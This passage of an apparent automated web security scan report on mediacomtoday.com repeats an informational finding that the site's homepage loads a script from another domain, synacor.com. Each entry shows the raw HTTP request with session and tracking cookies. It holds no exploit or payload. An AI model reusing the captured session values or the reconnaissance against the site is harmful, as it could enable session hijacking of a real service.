Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313378123420; dslv=1313378123421; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 03:44:09 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135913
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;51283a8e;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.2. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=3 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313348443950; dslv=1313348443951; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 19:29:28 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135542
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;2d813ddb;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.3. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=1 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_cc=true; s_nr=1313344950958; dslv=1313344950990; dslv_s=First%20Visit; s_vnum=1315936950998%26vn%3D1; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 18:31:18 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135453
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;688e01fd;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.4. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=5 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313351937705; dslv=1313351937706; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 20:27:41 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134998
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;0a720b96;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.5. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=7 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313355428797; dslv=1313355428798; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 21:25:52 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134942
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;c1369f1e;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.6. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=6 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313353684303; dslv=1313353684303; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 20:56:47 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134951
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;b77bb82b;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.7. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=8 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313357176985; dslv=1313357176986; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 21:54:58 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135724
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;f5a8cb38;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.8. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=2 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313346697417; dslv=1313346697418; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 19:00:24 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135429
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;a5152b80;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.9. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=23 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=22
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313383360709; dslv=1313383360710; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 05:11:09 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134146
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;75c8f93b;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.10. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=13 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313365903940; dslv=1313365903941; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 00:20:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135073
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;4331bba4;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.11. http://www.mediacomtoday.com/index.php  previous  next

